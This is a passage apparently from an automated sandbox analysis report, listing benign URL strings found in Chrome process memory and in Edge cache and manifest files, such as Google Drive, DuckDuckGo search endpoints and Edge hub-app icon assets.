    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
    Source: chromecache_473.19.drString found in binary or memory: https://domains.google.com/suggest/flow
    Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-autopush.corp.google.com/
    Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-0.corp.google.com/
    Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-1.corp.google.com/
    Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-2.corp.google.com/
    Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-3.corp.google.com/
    Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-4.corp.google.com/
    Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-5.corp.google.com/
    Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-6.corp.google.com/
    Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-preprod.corp.google.com/
    Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-staging.corp.google.com/
    Source: chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
    Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive.google.com/
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
    Source: chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
    Source: chrome.exe, 00000011.00000003.2793657944.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788298037.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814485401.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
    Source: Web Data.23.dr, lxlxt0.13.dr, 6xlx4w.13.drString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: chrome.exe, 00000011.00000003.2793657944.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788298037.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814485401.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, Web Data.23.dr, lxlxt0.13.dr, 6xlx4w.13.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: chrome.exe, 00000011.00000003.2793657944.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788298037.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814485401.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
    Source: Web Data.23.dr, lxlxt0.13.dr, 6xlx4w.13.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: 000003.log7.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
    Source: 000003.log7.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
    Source: 000003.log7.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr, HubApps Icons.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr, HubApps Icons.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr, HubApps Icons.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr, HubApps Icons.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
    Source: 000003.log7.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr, HubApps Icons.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr, HubApps Icons.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr, HubApps Icons.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr, HubApps Icons.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
    Source: 000003.log7.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://gaana.com/
    Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
    Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/%
    Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/&
    Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/(
    Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/)
    Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com//
    Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/0
    Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2
    Source: chrome.exe, 00000011.00000003.2821331354.0000513400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
    Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/3
